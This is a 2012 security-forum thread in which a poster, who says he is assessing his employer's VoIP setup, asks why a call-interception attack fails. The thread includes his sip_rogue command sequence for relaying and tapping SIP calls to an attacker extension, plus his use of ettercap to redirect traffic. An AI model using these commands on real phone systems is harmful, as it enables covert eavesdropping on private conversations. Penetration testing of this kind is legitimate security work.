Paid Advertising is
ha.ckers sla.cking
Breaking things on the go...iPhones, Androids, PalmOS, WinMo, etc... 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
voip Application-Level Interception need some adivce/help
Posted by: lazer
Date: January 13, 2012 12:26PM

I need help I work as sec analyst for a notable company in my country. I'm currently in the activity of assessing VOIP setup. I'm using Application-Level Interception Techniques to test the setup weakness. The tool i'm using to conduct interception level attack is sip_rogue. Sip_rogue is included in bt4. The attack allows you as attacker to listen the conversation occurring between sip phones. The commands are :-

telnet localhost 6060
Connection 0
create sipudpport port
create sipdispatcher disp
create sipregistrarconnector reg to with the domain
create rtphandler rtp
create sipendpoint hacker
issue hacker accept calls
issue hacker relay calls to sip:3500@
issue hacker tap calls to sip:4000@ (the attacker)

In the original attack mentioned in hacking exposed VOIP: voice over IP security secret and solution. The victim and the attacker in on the same vlan as proxy server but in my case its different VLAN. As i pick the fone (ext 4000) to listen on the conversation i just get the dial tone. I'm using ettercap to direct the traffic from the victim ip phone to bt4 machine running sip_rogue application.

I hope i can be helped with. Thanks

Options: ReplyQuote
Re: voip Application-Level Interception need some adivce/help
Posted by: Skyphire
Date: January 13, 2012 08:11PM

Scroll to page 74 and onwards, it goes a little deeper.

Options: ReplyQuote

Sorry, only registered users may post in this forum.